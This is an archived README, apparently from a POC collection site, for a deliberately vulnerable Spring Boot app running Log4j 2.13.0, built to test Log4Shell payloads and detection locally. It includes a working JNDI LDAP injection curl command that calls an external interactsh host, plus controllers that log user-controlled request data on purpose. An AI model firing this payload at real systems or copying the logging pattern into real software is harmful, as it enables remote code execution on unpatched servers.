关联漏洞
介绍
# CVE-2021-44228 Spring Boot Test Service
This is a dirty hack spring boot hello world proejct to test your tooling/payloads/detection capabilities locally before you hit production targets with them.
The configured Log4j version is 2.13.0
## Building the docker image
```bash
bash build.sh
```
## Running the docker image
```bash
docker run -p 8080:8080 dwdi/log4shell
```
## Testing / Triggering CVE-2021-44228
If you don't have burp collaborator running in the garage, you can visit this site to get a similar experience: https://interactsh.com
```bash
curl -s --max-time 20 localhost:8080 -H 'User-Agent: ${jndi:ldap://<some_custom_identifier>.<your_generated_subdomain>.interactsh.com/a}' > /dev/null
```
### Scanner tool
Optionall you can use this awesome repo for performing local/mass scanning: https://github.com/adilsoybali/Log4j-RCE-Scanner
### Trigger locations
This vulnerability is all about forcing a user controlled value to be logged by the vulnerable logging framework. With this in mind this simple dummy application supports two HTTP (GET/PUT) verbs and a bunch of injection locations:
```java
@GetMapping("/")
public String index(HttpServletRequest request) {
logger.info("Request URL: " + request.getRequestURL());
logger.info("Request URI: " + request.getRequestURI());
logger.info("Request Method: " + request.getMethod());
logger.info("Request Query String: " + request.getQueryString());
logger.info("Request Protocol: " + request.getProtocol());
logger.info("Request Remote Address: " + request.getRemoteAddr());
logger.info("Request Remote Host: " + request.getRemoteHost());
logger.info("Request Remote Port: " + request.getRemotePort());
logger.info("Request User Agent: " + request.getHeader("User-Agent"));
return "Log4J2 is working!";
}
```
```java
@PostMapping("/")
public String post(HttpServletRequest request, @RequestBody String body) {
logger.info("Request URL: " + request.getRequestURL());
logger.info("Request URI: " + request.getRequestURI());
logger.info("Request Method: " + request.getMethod());
logger.info("Request Query String: " + request.getQueryString());
logger.info("Request Protocol: " + request.getProtocol());
logger.info("Request Remote Address: " + request.getRemoteAddr());
logger.info("Request Remote Host: " + request.getRemoteHost());
logger.info("Request Remote Port: " + request.getRemotePort());
logger.info("Request User Agent: " + request.getHeader("User-Agent"));
logger.info("Request Body: " + body); // mind the extra request body
return "Log4J2 is working!";
}
```
Contribution / improvements are welcome.
Sorry for code quality :) this project is not for showoff but to share/help.
文件快照
[4.0K] /data/pocs/e9b6afb3753424e80dd33efac4e690dba7160fba
├── [ 722] build.gradle
├── [ 195] build.sh
├── [ 191] Dockerfile
├── [4.0K] gradle
│ └── [4.0K] wrapper
│ ├── [ 54K] gradle-wrapper.jar
│ └── [ 200] gradle-wrapper.properties
├── [5.8K] gradlew
├── [2.9K] gradlew.bat
├── [1.0K] LICENSE
├── [ 996] log4j.xml
├── [9.7K] mvnw
├── [6.2K] mvnw.cmd
├── [1.5K] pom.xml
├── [2.6K] README.md
├── [ 33] settings.gradle
└── [4.0K] src
├── [4.0K] main
│ └── [4.0K] java
│ └── [4.0K] com
│ └── [4.0K] example
│ └── [4.0K] springboot
│ ├── [ 829] Application.java
│ └── [1.9K] HelloController.java
└── [4.0K] test
└── [4.0K] java
└── [4.0K] com
└── [4.0K] example
└── [4.0K] springboot
├── [ 746] HelloControllerIT.java
└── [1017] HelloControllerTest.java
13 directories, 18 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。